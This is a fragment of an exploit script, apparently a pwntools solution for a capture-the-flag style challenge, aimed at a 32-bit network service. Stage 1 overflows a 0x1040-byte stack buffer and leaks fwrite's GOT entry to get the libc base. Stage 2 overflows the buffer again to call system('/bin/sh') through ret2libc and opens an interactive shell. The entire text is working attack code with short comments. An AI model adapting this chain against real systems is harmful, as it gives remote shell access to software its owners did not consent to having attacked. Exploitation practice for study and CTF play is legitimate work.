# Stage 1: overflow the 0x1040-byte buffer, clobber the saved EBP, return into
# `text` with fwrite's GOT entry as the argument to leak a libc address, then
# return to main for a second round
payload = b'a' * 0x1040
payload += b'bbbb'
payload += p32(text)
payload += p32(main)
payload += p32(fwrite_got)
p.sendline(payload + b'\n')
p.recvuntil(b'Connection: close\r\n\r\n')
p.recvuntil(b'Connection: close\r\n\r\n')
libc_base = u32(p.recv(4)) - libc.sym['fwrite']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
log.info('libc base: %#x', libc_base)

# Stage 2: same overflow, now ret2libc: system("/bin/sh")
p.sendline(head.encode())
p.sendline(b'Content:filename=')
payload = b'a' * 0x1040
payload += b'bbbb'
payload += p32(system)
payload += b'bbbb'           # fake return address for system()
payload += p32(binsh)
p.sendline(payload + b'\n')
p.interactive()